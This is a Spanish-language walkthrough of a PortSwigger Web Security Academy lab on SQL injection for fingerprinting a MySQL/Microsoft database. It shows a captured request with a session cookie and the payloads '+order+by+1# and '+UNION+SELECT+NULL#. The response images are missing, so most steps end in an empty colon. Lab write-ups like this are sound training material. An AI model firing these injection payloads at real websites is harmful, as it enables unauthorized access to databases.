Lab 4: SQL injection attack, querying the database type and version on MySQL and Microsoft

Se inicia el laboratorio y al interactuar con los filtros de busqueda:

Se genera la siguiente peticion:

GET /filter?category=Food+%26+Drink HTTP/2
Host: 0a0f00790407044482581a7e000a008b.web-security-academy.net
Cookie: session=0K44VOczBGqjjsestx2sxen5okKNiH33
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a0f00790407044482581a7e000a008b.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Y esto responde con:

Asi que procedemos a realizar nuestra primera inyeccion SQL: '+order+by+1#

Lo anterior responde con:

Enviamos la siguiente peticion incrementando el numero a 2:

Y lo anterior respondera con:

Y finalizamos con el numero 3:

Esta peticion entrega un error:

Luego de lo anterior, podemos afirmar que tenemos dos campos para poder retornar data:

Otra forma de validar, es utilizando UNION: '+UNION+SELECT+NULL#

Y lo anterior retorna un error:

Y si agregamos otro NULL:

Se obtiene una respuesta sin codigos de error:

Y si incrementamos, obviamente saldra un error:

Lo anterior, responde asi:

Se procede a validar el tipo de dato para cada columna:

Y se logra detectar que ambos campos son de tipo STRING:

Por lo anterior, finalizamos con la inyeccion que retorna la version:

Lo anterior responde asi: